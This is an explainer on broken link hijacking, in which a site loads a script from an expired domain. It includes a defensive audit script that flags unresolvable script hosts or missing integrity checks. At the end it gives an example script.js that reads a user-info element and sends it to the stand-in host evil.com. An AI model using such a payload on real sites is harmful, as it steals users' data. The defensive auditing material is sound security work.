Broken Link Hijacking

Broken Link Hijacking is an attack in which an attacker executes arbitrary code by taking over the target of a broken link, e.g. a JavaScript file, that the target website still loads.

- [broken-link-hijacking](https://edoverflow.com/2017/broken-link-hijacking/)

Investigation

Assume that the target website loads an external JavaScript file from example.com, a domain that no longer exists, as below.

```html
<script src="//example.com/script.js"></script>
```

If an attacker buys this domain, they can host an arbitrary JavaScript file named script.js in the example.com root directory.
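
To find this condition on your own pages before someone else does, the following audit sketch lists external script sources whose host no longer resolves. It is an added example, not code from the original page; the page URL, the sample HTML and the host names other than example.com are constructed, and the Subresource Integrity check is an extra mitigation signal that the page itself does not discuss.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit
import socket

PAGE_URL = "https://shop.test/account"  # constructed page URL
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="//example.com/script.js"></script>
<script src="https://cdn.test/lib.js" integrity="sha384-CONSTRUCTED"></script>
<script src="https://widgets.test/w.js"></script>
</head></html>"""  # constructed sample input

class ScriptCollector(HTMLParser):
    """Collects (src, integrity) for every <script src=...> tag."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script" and attrs.get("src"):
            self.scripts.append((attrs["src"], attrs.get("integrity")))

def dns_resolves(host):
    """Default resolver check; a failed lookup means the link is broken."""
    try:
        socket.getaddrinfo(host, None)
        return True
    except socket.gaierror:
        return False

def audit_scripts(page_url, html, resolves=dns_resolves):
    """Return (url, finding) for each risky third-party script on the page."""
    page_host = urlsplit(page_url).hostname
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, integrity in collector.scripts:
        url = urljoin(page_url, src)  # also expands //host/path and relative paths
        host = urlsplit(url).hostname
        if host is None or host == page_host:
            continue  # same-origin script, out of scope here
        if not resolves(host):
            findings.append((url, "host-does-not-resolve"))
        elif not integrity:
            findings.append((url, "no-sri"))  # a changed file would still execute
    return findings

if __name__ == "__main__":
    for url, finding in audit_scripts(PAGE_URL, SAMPLE_HTML):
        print(finding, url)
```

A host that fails to resolve still needs a registrar lookup to confirm that the domain is actually available for registration; remove or re-host any script flagged this way.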


Exploitation Examples

An attacker can write arbitrary code in script.js to compromise users, as in the example above.
For example, if the target website includes sensitive information about the authenticated user in the page where the broken link is loaded, attackers can send this information to a server they own.

```javascript
// script.js
var secret = document.getElementById('userinfo');
var request = new XMLHttpRequest();
request.open('GET', 'http://evil.com/?data=' + secret, false);
request.send();
```